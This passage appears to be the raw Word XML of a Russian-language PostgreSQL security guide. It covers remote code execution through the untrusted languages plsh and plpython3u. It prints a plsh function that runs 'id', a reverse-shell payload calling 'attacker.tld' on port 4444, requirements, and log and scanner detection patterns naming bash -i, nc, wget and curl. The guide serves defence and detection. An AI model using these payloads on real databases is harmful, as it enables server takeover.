        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB4820B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDB6D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$sh$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C1D96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.s();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2757E846" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (то же самое):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727684BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.s() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF5985" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plsh AS $sh$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA1DC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144582B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7488F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$sh$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA74EBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.s();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84C317" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> записывает тело во временный файл, делает chmod +x, выполняет через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:t>. Возвращаемое значение — stdout последней команды.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D0AB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse-shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D01121" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.s() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242DD6E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plsh AS $sh$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D998947" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56340EDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262ACBE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$sh$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DCA59F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.s();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA9CA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Произвольный Python или shell-код выполняется в адресном пространстве backend-процесса PostgreSQL под OS-пользователем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>. Возможности идентичны 3.7.2a (plperlu): доступ к файловой системе, сетевые соединения, env, fork(). После RCE — стандартный набор post-exploitation (см. 3.7.1 и 3.7.2a).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E88EFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plpython3u и plsh — namensgebung-untrusted: суффикс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или язык </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> означает «без sandbox по умолчанию». PostgreSQL делегирует contention выбор Python-/shell-runtime, не пытаясь ограничивать API. CREATE FUNCTION требует superuser именно из-за этого — security-граница на уровне привилегий, не на уровне runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC204A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trusted-вариант </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plpythonu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> существовал в старых версиях PostgreSQL (до 9.x), использовал Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>restricted execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — этот механизм был признан небезопасным и удалён из Python 2 в 2003 г. С появлением Python 3 trusted-вариант не возрождали; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plpython3u — единственный доступный PL/Python вариант с PG 11+</w:t>
      </w:r>
      <w:r>
        <w:t>, и он untrusted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A387F6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347CC0B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plpython3u в стандартной поставке с PG 11+ (раньше был plpythonu — deprecated). plsh — отдельный пакет, доступен для всех current PG-версий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F97FE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> может CREATE EXTENSION plpython3u / plsh и CREATE FUNCTION в этих языках.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAC7178" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889FD68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (в contrib, идёт со стандартной поставкой PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB5F84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (отдельный пакет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql-XX-plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Debian/Ubuntu; github.com/petere/plsh; нужно отдельно установить на сервер)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651C1189" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS-зависимости:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D992A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   plpython3u — Python 3 runtime + postgresql-plpython3 пакет</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC015C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   plsh — bash (стандартный во всех Linux-сборках)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D0774" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет специальных требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83DB0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plr / plv8:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plr — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, отдельный пакет postgresql-plr, нужен R-runtime. plv8 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plv8</w:t>
      </w:r>
      <w:r>
        <w:t>, отдельный пакет postgresql-plv8, нужен V8-engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0377BA33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plpython3u встречается в production-кодах для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232EF1A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   ML-инференса прямо из БД (например, scoring-функция, использующая pickle-модель)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF92CD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   сложного text/JSON processing с использованием Python-библиотек</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A3582" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   web-scraping triggers (редко, обычно в anti-pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68238A4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>plsh встречается крайне редко — в основном для admin-хелперов вызова внешних утилит из триггера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D9027" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки в логах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0FFC64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = 'ddl'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION ... LANGUAGE plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не-DBA сессии</w:t>
      </w:r>
      <w:r>
        <w:t>. Чёткий маркер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252421A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pP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фильтр по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prolang IN ('plpython3u', 'plsh', 'plperlu', 'plr')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — алерт на любое CREATE FUNCTION в untrusted-языках от не-whitelist-роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE94A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: статический сканер на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import subprocess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>os.system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>subprocess.run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в plpython3u; на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash -i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
